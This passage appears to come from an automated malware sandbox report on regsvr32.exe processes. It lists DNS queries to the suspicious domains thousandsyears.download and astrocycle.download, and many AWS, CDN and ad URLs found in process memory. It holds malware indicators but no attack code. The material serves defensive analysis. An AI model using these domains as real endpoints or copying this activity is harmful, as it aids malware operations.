https://www.youtube-nocookie.com; img-src 'self' data: https://*.ads.linkedin.com https://*.vidyard.com https://*.ytimg.com https://a0.awsstatic.com https://amazonwebservices.d2.sc.omtrdc.net https://aws-quickstart.s3.amazonaws.com https://awsmedia.s3.amazonaws.com https://d1.awsstatic-china.com https://d1.awsstatic.com https://d2908q01vomqb2.cloudfront.net https://d36cz9buwru1tt.cloudfront.net https://docs.aws.amazon.com https://dpm.demdex.net 
https://fls-na.amazon.com https://googleads.g.doubleclick.net https://img.youtube.com https://marketingplatform.google.com https://media.amazonwebservices.com https://p.adsymptotic.com https://pages.awscloud.com https://s3.amazonaws.com/aws-quickstart/ https://ssl-static.libsyn.com https://static-cdn.jtvnw.net https://www.google.com https://www.linkedin.com https://yt3.ggpht.com; media-src 'self' https://*.libsyn.com https://a0.awsstatic.com https://anchor.fm https://awsmedia.s3.amazonaws.com https://awspodcastsiberiaent.s3.eu-west-3.amazonaws.com https://chtbl.com https://d1.awsstatic.com https://d1hemuljm71t2j.cloudfront.net https://d1le29qyzha1u4.cloudfront.net https://d1oqpvwii7b6rh.cloudfront.net https://d1vo51ubqkiilx.cloudfront.net https://d1yyh5dhdgifnx.cloudfront.net https://d2908q01vomqb2.cloudfront.net https://d2a6igt6jhaluh.cloudfront.net https://d3ctxlq1ktw2nl.cloudfront.net https://d3h2ozso0dirfl.cloudfront.net https://dgen8gghn3u86.cloudfront.net https://dk261l6wntthl.cloudfront.net https://download.stormacq.com/aws/podcast/ https://dts.podtrac.com https://media.amazonwebservices.com https://mktg-apac.s3-ap-southea
        Source: regsvr32.exe, 00000004.00000002.2113610800.0000000003030000.00000004.00000001.sdmpString found in binary or memory: front.net https://d3borx6sfvnesb.cloudfront.net https://dc.ads.linkedin.com https://dftu77xade0tc.cloudfront.net https://dpm.demdex.net https://fls-na.amazon.com https://googleads.g.doubleclick.net https://i18n-string.us-west-2.prod.pricing.aws.a2z.com https://prod.log.shortbread.aws.dev https://prod.tools.shortbread.aws.dev https://s0.awsstatic.com https://s3.amazonaws.com/aws-messaging-pricing-information/ https://s3.amazonaws.com/public-pricing-agc/ https://spot-bid-advisor.s3.amazonaws.com https://view-stage.us-west-2.prod.pricing.aws.a2z.com https://view-staging.us-east-1.prod.plc1-prod.pricing.aws.a2z.com https://www.youtube-nocookie.com; font-src 'self' data: https://a0.awsstatic.com https://f0.awsstatic.com https://fonts.gstatic.com; frame-src 'self' https8z equals www.linkedin.com (Linkedin)
        Source: regsvr32.exe, 00000003.00000002.2101851829.00000000001FD000.00000004.00000020.sdmp, regsvr32.exe, 00000004.00000003.2106693910.0000000000407000.00000004.00000001.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
        Source: unknown DNS traffic detected: queries for: thousandsyears.download
        Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found
        Date: Tue, 06 Jul 2021 13:07:27 GMT
        Content-Type: text/html; charset=UTF-8
        Transfer-Encoding: chunked
        Connection: keep-alive
        CF-Cache-Status: DYNAMIC
        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=GN9wYO%2BIuHVeDE2EWDQTg%2BEKZY5Nl%2Fwc0vzEgt9k98rnRs6rIHEnNd7r%2F6bXYCKHxUmoJyoC1IQCkvi71zSQPkur0%2F%2BM4ztJ8f9a4JHQ6lws%2Fs6%2B%2Br%2FebSEod2C%2FoFGRjQ%3D%3D"}],"group":"cf-nel","max_age":604800}
        NEL: {"report_to":"cf-nel","max_age":604800}
        Server: cloudflare
        CF-RAY: 66a90e5fff624a61-FRA
        alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
        Data Ascii: 111<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at astrocycle.download Port 80</address></body></html>
        Source: regsvr32.exe, 00000003.00000002.2101851829.00000000001FD000.00000004.00000020.sdmp, regsvr32.exe, 00000004.00000002.2111691413.00000000003E7000.00000004.00000020.sdmp, regsvr32.exe, 00000005.00000002.2116860376.00000000004B3000.00000004.00000020.sdmp
        String found in binary or memory: http://astrocycle.download/
        Source: regsvr32.exe, 00000003.00000003.2098314338.0000000002B82000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2113666221.0000000003046000.00000004.00000001.sdmpString found in binary or memory: https://a0.awsstatic.com/plc/js/1.0.112/plc
        Source: regsvr32.exe, 00000003.00000003.2098314338.0000000002B82000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2113666221.0000000003046000.00000004.00000001.sdmpString found in binary or memory: https://a0.awsstatic.com/pricing-calculator/js/1.0.2
        Source: regsvr32.exe, 00000003.00000003.2098314338.0000000002B82000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2113666221.0000000003046000.00000004.00000001.sdmpString found in binary or memory: https://a0.awsstatic.com/pricing-savings-plan/js/1.0.6
        Source: regsvr32.exe, 00000003.00000003.2098314338.0000000002B82000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2113666221.0000000003046000.00000004.00000001.sdmpString found in binary or memory: https://a0.awsstatic.com/psf/null
        Source: regsvr32.exe, 00000003.00000003.2098314338.0000000002B82000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2113666221.0000000003046000.00000004.00000001.sdmpString found in binary or memory: https://a0.awsstatic.com/s_code/js/3.0/awshome_s_code.js
        Source: regsvr32.exe, 00000003.00000003.2098314338.0000000002B82000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2113666221.0000000003046000.00000004.00000001.sdmpString found in binary or memory: https://a0.awsstatic.com/target/1.0.114/aws-target-mediator.js
        Source: regsvr32.exe, 00000004.00000003.2106480345.000000000303C000.00000004.00000001.sdmpString found in binary or memory: https://a0.awsstatic.com;
        Source: regsvr32.exe, 00000004.00000002.2113610800.0000000003030000.00000004.00000001.sdmpString found in binary or memory: https://a0.p
        Source: regsvr32.exe, 00000004.00000003.2106480345.000000000303C000.00000004.00000001.sdmpString found in binary or memory: https://a0.p.awsstatic.com
        Source: regsvr32.exe, 00000004.00000002.2113610800.0000000003030000.00000004.00000001.sdmpString found in binary or memory: https://a0.pstat8
        Source: regsvr32.exe, 00000004.00000003.2106480345.000000000303C000.00000004.00000001.sdmpString found in binary or memory: https://a1.awsstatic.com
        Source: regsvr32.exe, 00000003.00000002.2101851829.00000000001FD000.00000004.00000020.sdmpString found in binary or memory: https://amazon.com/
        Source: regsvr32.exe, 00000004.00000003.2106693910.0000000000407000.00000004.00000001.sdmpString found in binary or memory: https://amazon.com/.
        Source: regsvr32.exe, 00000004.00000003.2106693910.0000000000407000.00000004.00000001.sdmpString found in binary or memory: https://amazon.com/=
        Source: regsvr32.exe, 00000004.00000003.2106480345.000000000303C000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2113610800.0000000003030000.00000004.00000001.sdmpString found in binary or memory: https://amazonwebservices.d2.sc.omtrdc.net
        Source: regsvr32.exe, 00000004.00000003.2106480345.000000000303C000.00000004.00000001.sdmpString found in binary or memory: https://amazonwebservicesinc.tt.omtrdc.net
        Source: regsvr32.exe, 00000004.00000003.2106480345.000000000303C000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2113610800.0000000003030000.00000004.00000001.sdmpString found in binary or memory: https://anchor.fm
        Source: regsvr32.exe, 00000004.00000003.2106480345.000000000303C000.00000004.00000001.sdmpString found in binary or memory: https://api.regional-table.region-services.aws.a2z.com
        Source: regsvr32.exe, 00000004.00000003.2106480345.000000000303C000.00000004.00000001.sdmpString found in binary or memory: https://api.us-west-2.prod.pricing.aws.a2z.com
        Source: regsvr32.exe, 00000004.00000003.2106480345.000000000303C000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2113610800.0000000003030000.00000004.00000001.sdmpString found in binary or memory: https://aws-quickstart.s3.amazonaws.com
        Source: regsvr32.exe, 00000004.00000002.2113666221.0000000003046000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2111691413.00000000003E7000.00000004.00000020.sdmpString found in binary or memory: https://aws.amazon.com/
        Source: regsvr32.exe, 00000004.00000003.2106538777.00000000003EC000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/4n
        Source: regsvr32.exe, 00000004.00000002.2113666221.0000000003046000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/?nc1=h_ls
        Source: regsvr32.exe, 00000004.00000002.2113666221.0000000003046000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/?nc2=h_lg
        Source: regsvr32.exe, 00000004.00000003.2106693910.0000000000407000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/S
        Source: regsvr32.exe, 00000003.00000003.2098314338.0000000002B82000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2113666221.0000000003046000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/ar/
        Source: regsvr32.exe, 00000004.00000002.2113666221.0000000003046000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/ar/?nc1=h_ls
        Source: regsvr32.exe, 00000003.00000003.2098314338.0000000002B82000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2113666221.0000000003046000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/cn/
        Source: regsvr32.exe, 00000004.00000002.2113666221.0000000003046000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/cn/?nc1=h_ls
        Source: regsvr32.exe, 00000003.00000003.2098314338.0000000002B82000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2113666221.0000000003046000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/de/
        Source: regsvr32.exe, 00000004.00000002.2113666221.0000000003046000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/de/?nc1=h_ls
        Source: regsvr32.exe, 00000003.00000003.2098314338.0000000002B82000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2113666221.0000000003046000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/es/
        Source: regsvr32.exe, 00000004.00000002.2113666221.0000000003046000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/es/?nc1=h_ls
        Source: regsvr32.exe, 00000003.00000003.2098314338.0000000002B82000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2113666221.0000000003046000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/fr/
        Source: regsvr32.exe, 00000004.00000002.2113666221.0000000003046000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/fr/?nc1=h_ls
        Source: regsvr32.exe, 00000003.00000003.2098314338.0000000002B82000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2113666221.0000000003046000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/id/
        Source: regsvr32.exe, 00000004.00000002.2113666221.0000000003046000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/id/?nc1=h_ls
        Source: regsvr32.exe, 00000003.00000003.2098314338.0000000002B82000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2113666221.0000000003046000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/it/
        Source: regsvr32.exe, 00000004.00000002.2113666221.0000000003046000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/it/?nc1=h_ls
        Source: regsvr32.exe, 00000003.00000003.2098314338.0000000002B82000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2113666221.0000000003046000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/jp/
        Source: regsvr32.exe, 00000004.00000002.2113666221.0000000003046000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/jp/?nc1=h_ls
        Source: regsvr32.exe, 00000003.00000003.2098314338.0000000002B82000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2113666221.0000000003046000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/ko/
        Source: regsvr32.exe, 00000004.00000002.2113666221.0000000003046000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/ko/?nc1=h_ls
        Source: regsvr32.exe, 00000003.00000003.2098314338.0000000002B82000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2113666221.0000000003046000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/marketplace/?nc2=h_mo
        Source: regsvr32.exe, 00000003.00000003.2098314338.0000000002B82000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2113666221.0000000003046000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/marketplace/?nc2=h_ql_mp
        Source: regsvr32.exe, 00000003.00000002.2102922360.0000000002B92000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2113666221.0000000003046000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/podcasts/aws-podcast/
        Source: regsvr32.exe, 00000003.00000002.2102922360.0000000002B92000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2113666221.0000000003046000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/privacy/?nc1=f_pr
        Source: regsvr32.exe, 00000003.00000003.2098314338.0000000002B82000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2113666221.0000000003046000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/pt/
        Source: regsvr32.exe, 00000004.00000002.2113666221.0000000003046000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/pt/?nc1=h_ls
        Source: regsvr32.exe, 00000003.00000003.2098314338.0000000002B82000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2113666221.0000000003046000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/ru/
        Source: regsvr32.exe, 00000004.00000002.2113666221.0000000003046000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/ru/?nc1=h_ls
        Source: regsvr32.exe, 00000003.00000003.2098314338.0000000002B82000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2113666221.0000000003046000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/search
        Source: regsvr32.exe, 00000003.00000003.2098314338.0000000002B82000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2113666221.0000000003046000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/search/
        Source: regsvr32.exe, 00000003.00000003.2098314338.0000000002B82000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2113666221.0000000003046000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/search/?searchQuery=
        Source: regsvr32.exe, 00000003.00000002.2102922360.0000000002B92000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2113666221.0000000003046000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/terms/?nc1=f_pr
        Source: regsvr32.exe, 00000003.00000003.2098314338.0000000002B82000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2113666221.0000000003046000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/th/
        Source: regsvr32.exe, 00000004.00000002.2113666221.0000000003046000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/th/?nc1=f_ls
        Source: regsvr32.exe, 00000003.00000003.2098314338.0000000002B82000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2113666221.0000000003046000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/tr/
        Source: regsvr32.exe, 00000004.00000002.2113666221.0000000003046000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/tr/?nc1=h_ls
        Source: regsvr32.exe, 00000003.00000003.2098314338.0000000002B82000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2113666221.0000000003046000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/tw/
        Source: regsvr32.exe, 00000003.00000003.2098314338.0000000002B82000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/tw/?nc1=h
        Source: regsvr32.exe, 00000004.00000002.2113666221.0000000003046000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/tw/?nc1=h_ls
        Source: regsvr32.exe, 00000003.00000003.2098314338.0000000002B82000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2113666221.0000000003046000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/vi/
        Source: regsvr32.exe, 00000004.00000002.2113666221.0000000003046000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/vi/?nc1=f_ls
        Source: regsvr32.exe, 00000004.00000002.2113610800.0000000003030000.00000004.00000001.sdmpString found in binary or memory: https://awsmedia.s3.amazonaws.com
        Source: regsvr32.exe, 00000004.00000003.2106480345.000000000303C000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2113610800.0000000003030000.00000004.00000001.sdmpString found in binary or memory: https://awspodcastsiberiaent.s3.eu-west-3.amazonaws.com
        Source: regsvr32.exe, 00000004.00000003.2106480345.000000000303C000.00000004.00000001.sdmpString found in binary or memory: https://b0.p.awsstatic.com
        Source: regsvr32.exe, 00000004.00000003.2106480345.000000000303C000.00000004.00000001.sdmpString found in binary or memory: https://c0.b0.p.awsstatic.com
        Source: regsvr32.exe, 00000004.00000003.2106480345.000000000303C000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2113610800.0000000003030000.00000004.00000001.sdmpString found in binary or memory: https://calculator.aws
        Source: regsvr32.exe, 00000004.00000002.2113610800.0000000003030000.00000004.00000001.sdmpString found in binary or memory: https://calculator.wsstatic.com
        Source: regsvr32.exe, 00000004.00000003.2106480345.000000000303C000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2113610800.0000000003030000.00000004.00000001.sdmpString found in binary or memory: https://chtbl.com
        Source: regsvr32.exe, 00000003.00000003.2098314338.0000000002B82000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2113666221.0000000003046000.00000004.00000001.sdmpString found in binary or memory: https://console.aws.amazon.com/?nc2=h_m_mc
        Source: regsvr32.exe, 00000003.00000003.2098314338.0000000002B82000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2113666221.0000000003046000.00000004.00000001.sdmpString found in binary or memory: https://console.aws.amazon.com/billing/home?nc2=h_m_bc
        Source: regsvr32.exe, 00000003.00000003.2098314338.0000000002B82000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2113666221.0000000003046000.00000004.00000001.sdmpString found in binary or memory: https://console.aws.amazon.com/console/home
        Source: regsvr32.exe, 00000003.00000002.2102922360.0000000002B92000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2113666221.0000000003046000.00000004.00000001.sdmpString found in binary or memory: https://console.aws.amazon.com/console/home?nc1=f_ct&amp;src=footer-signin-mobile
        Source: regsvr32.exe, 00000003.00000003.2098314338.0000000002B82000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2113666221.0000000003046000.00000004.00000001.sdmpString found in binary or memory: https://console.aws.amazon.com/iam/home?nc2=h_m_sc#security_credential
        Source: regsvr32.exe, 00000003.00000002.2102922360.0000000002B92000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2113666221.0000000003046000.00000004.00000001.sdmpString found in binary or memory: https://console.aws.amazon.com/support/home/?nc1=f_dr
        Source: regsvr32.exe, 00000003.00000003.2098314338.0000000002B82000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2113666221.0000000003046000.00000004.00000001.sdmpString found in binary or memory: https://console.aws.amazon.com/support/home/?nc2=h_ql_cu
        Source: regsvr32.exe, 00000003.00000003.2098314338.0000000002B82000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2113666221.0000000003046000.00000004.00000001.sdmpString found in binary or memory: https://console.aws.amazon.com/support/home?nc2=h_ql_cu
        Source: regsvr32.exe, 00000004.00000003.2106480345.000000000303C000.00000004.00000001.sdmpString found in binary or memory: https://d0.awsstatic.com
        Source: regsvr32.exe, 00000004.00000003.2106480345.000000000303C000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2113610800.0000000003030000.00000004.00000001.sdmpString found in binary or memory: https://d1.awsstatic-china.com
        Source: regsvr32.exe, 00000004.00000002.2113610800.0000000003030000.00000004.00000001.sdmpString found in binary or memory: https://d1.awsstatic.com
        Source: regsvr32.exe, 00000004.00000003.2106480345.000000000303C000.00000004.00000001.sdmpString found in binary or memory: https://d1fgizr415o1r6.cloudfront.net
        Source: regsvr32.exe, 00000004.00000003.2106480345.000000000303C000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2113610800.0000000003030000.00000004.00000001.sdmpString found in binary or memory: https://d1hemuljm71t2j.cloudfront.net
        Source: regsvr32.exe, 00000004.00000003.2106480345.000000000303C000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2113610800.0000000003030000.00000004.00000001.sdmpString found in binary or memory: https://d1le29qyzha1u4.cloudfront.net
        Source: regsvr32.exe, 00000004.00000003.2106480345.000000000303C000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2113610800.0000000003030000.00000004.00000001.sdmpString found in binary or memory: https://d1oqpvwii7b6rh.cloudfront.net
        Source: regsvr32.exe, 00000004.00000003.2106480345.000000000303C000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2113610800.0000000003030000.00000004.00000001.sdmpString found in binary or memory: https://d1vo51ubqkiilx.cloudfront.net
        Source: regsvr32.exe, 00000004.00000003.2106480345.000000000303C000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2113610800.0000000003030000.00000004.00000001.sdmpString found in binary or memory: https://d1yyh5dhdgifnx.cloudfront.net
        Source: regsvr32.exe, 00000004.00000002.2113610800.0000000003030000.00000004.00000001.sdmpString found in binary or memory: https://d2908q01vomqb2.cloudfront.net
        Source: regsvr32.exe, 00000004.00000003.2106480345.000000000303C000.00000004.00000001.sdmpString found in binary or memory: https://d2a6igt6jhaluh.cloudfront.net
        Source: regsvr32.exe, 00000004.00000003.2106480345.000000000303C000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2113610800.0000000003030000.00000004.00000001.sdmpString found in binary or memory: https://d36cz9buwru1tt.cloudfront.net
        Source: regsvr32.exe, 00000004.00000003.2106480345.000000000303C000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2113610800.0000000003030000.00000004.00000001.sdmpString found in binary or memory: https://d3borx6sfvnesb.cloudfront.net
        Source: regsvr32.exe, 00000004.00000003.2106480345.000000000303C000.00000004.00000001.sdmpString found in binary or memory: https://d3ctxlq1ktw2nl.cloudfront.net
        Source: regsvr32.exe, 00000004.00000003.2106480345.000000000303C000.00000004.00000001.sdmpString found in binary or memory: https://d3h2ozso0dirfl.cloudfront.net
        Source: regsvr32.exe, 00000004.00000003.2106480345.000000000303C000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2113610800.0000000003030000.00000004.00000001.sdmpString found in binary or memory: https://dc.ads.linkedin.com
        Source: regsvr32.exe, 00000003.00000002.2102922360.0000000002B92000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2113666221.0000000003046000.00000004.00000001.sdmpString found in binary or memory: https://dc.ads.linkedin.com/collect/?pid=3038&amp;fmt=gif
        Source: regsvr32.exe, 00000003.00000003.2098314338.0000000002B82000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2113666221.0000000003046000.00000004.00000001.sdmp, regsvr32.exe, 00000005.00000002.2118001022.0000000002901000.00000004.00000001.sdmpString found in binary or memory: https://devices.amazonaws.com?hp=tile&amp;so-exp=below
        Source: regsvr32.exe, 00000004.00000003.2106480345.000000000303C000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2113610800.0000000003030000.00000004.00000001.sdmpString found in binary or memory: https://dftu77xade0tc.cloudfront.net
        Source: regsvr32.exe, 00000004.00000003.2106480345.000000000303C000.00000004.00000001.sdmpString found in binary or memory: https://dgen8gghn3u86.cloudfront.net
        Source: regsvr32.exe, 00000004.00000003.2106480345.000000000303C000.00000004.00000001.sdmpString found in binary or memory: https://dk261l6wntthl.cloudfront.net
        Source: regsvr32.exe, 00000004.00000003.2106480345.000000000303C000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2113610800.0000000003030000.00000004.00000001.sdmpString found in binary or memory: https://docs.aws.amazon.com
        Source: regsvr32.exe, 00000003.00000003.2098314338.0000000002B82000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2113666221.0000000003046000.00000004.00000001.sdmpString found in binary or memory: https://docs.aws.amazon.com/index.html?nc2=h_ql_doc
        Source: regsvr32.exe, 00000004.00000003.2106480345.000000000303C000.00000004.00000001.sdmpString found in binary or memory: https://download.stormacq.com/aws/podcast/
        Source: regsvr32.exe, 00000004.00000002.2113610800.0000000003030000.00000004.00000001.sdmpString found in binary or memory: https://dpm.demdex.net
        Source: regsvr32.exe, 00000004.00000003.2106480345.000000000303C000.00000004.00000001.sdmpString found in binary or memory: https://dts.podtrac.com
        Source: regsvr32.exe, 00000004.00000003.2106480345.000000000303C000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2113610800.0000000003030000.00000004.00000001.sdmpString found in binary or memory: https://f0.awsstatic.com
        Source: regsvr32.exe, 00000004.00000002.2113610800.0000000003030000.00000004.00000001.sdmpString found in binary or memory: https://fls-na.amazon.com
        Source: regsvr32.exe, 00000004.00000002.2113666221.0000000003046000.00000004.00000001.sdmpString found in binary or memory: https://fls-na.amazon.com/1/action-impressions/1/OE/aws-mktg/action/awsm_:comp_DeprecatedBrowser
        Source: regsvr32.exe, 00000004.00000003.2106480345.000000000303C000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2113610800.0000000003030000.00000004.00000001.sdmpString found in binary or memory: https://fonts.gstatic.com;
        Source: regsvr32.exe, 00000004.00000002.2113610800.0000000003030000.00000004.00000001.sdmpString found in binary or memory: https://googleads.g.doubleclick.net
        Source: regsvr32.exe, 00000004.00000003.2106480345.000000000303C000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2113610800.0000000003030000.00000004.00000001.sdmpString found in binary or memory: https://i18n-string.us-west-2.prod.pricing.aws.a2z.com
        Source: regsvr32.exe, 00000004.00000003.2106480345.000000000303C000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2113610800.0000000003030000.00000004.00000001.sdmpString found in binary or memory: https://img.youtube.com
        Source: regsvr32.exe, 00000004.00000003.2106480345.000000000303C000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2113610800.0000000003030000.00000004.00000001.sdmpString found in binary or memory: https://marketingplatform.google.com
        Source: regsvr32.exe, 00000004.00000003.2106480345.000000000303C000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2113610800.0000000003030000.00000004.00000001.sdmpString found in binary or memory: https://media.amazonwebservices.com
        Source: regsvr32.exe, 00000004.00000003.2106480345.000000000303C000.00000004.00000001.sdmpString found in binary or memory: https://mktg-apac.s3-ap-southeast-1.amazonaws.com
        Source: regsvr32.exe, 00000004.00000003.2106480345.000000000303C000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2113610800.0000000003030000.00000004.00000001.sdmpString found in binary or memory: https://p.adsymptotic.com
        Source: regsvr32.exe, 00000004.00000003.2106480345.000000000303C000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2113610800.0000000003030000.00000004.00000001.sdmpString found in binary or memory: https://pages.awscloud.com
        Source: regsvr32.exe, 00000003.00000002.2102922360.0000000002B92000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2113666221.0000000003046000.00000004.00000001.sdmpString found in binary or memory: https://pages.awscloud.com/communication-preferences?trk=homepage
        Source: regsvr32.exe, 00000003.00000002.2102922360.0000000002B92000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2113666221.0000000003046000.00000004.00000001.sdmpString found in binary or memory: https://pages.awscloud.com/fico-case-study.html?hp=tile&amp;story=fico
        Source: regsvr32.exe, 00000003.00000002.2102922360.0000000002B92000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2113666221.0000000003046000.00000004.00000001.sdmpString found in binary or memory: https://pages.awscloud.com/zillow-case-study?hp=tile&amp;story=zllw
        Source: regsvr32.exe, 00000003.00000003.2098314338.0000000002B82000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2113666221.0000000003046000.00000004.00000001.sdmpString found in binary or memory: https://phd.aws.amazon.com/?nc2=h_m_sc
        Source: regsvr32.exe, 00000003.00000003.2098314338.0000000002B82000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2113666221.0000000003046000.00000004.00000001.sdmpString found in binary or memory: https://portal.aws.amazon.com/gp/aws/developer/registration/index.html?exp=default
        Source: regsvr32.exe, 00000003.00000003.2098314338.0000000002B82000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2113666221.0000000003046000.00000004.00000001.sdmpString found in binary or memory: https://portal.aws.amazon.com/gp/aws/developer/registration/index.html?exp=default&amp;sc_icampaign=
        Source: regsvr32.exe, 00000003.00000002.2102922360.0000000002B92000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2113666221.0000000003046000.00000004.00000001.sdmpString found in binary or memory: https://portal.aws.amazon.com/gp/aws/developer/registration/index.html?nc1=f_ct&amp;src=default
        Source: regsvr32.exe, 00000003.00000003.2098314338.0000000002B82000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2113666221.0000000003046000.00000004.00000001.sdmpString found in binary or memory: https://portal.aws.amazon.com/gp/aws/developer/registration/index.html?nc2=h_ct&amp;src=default
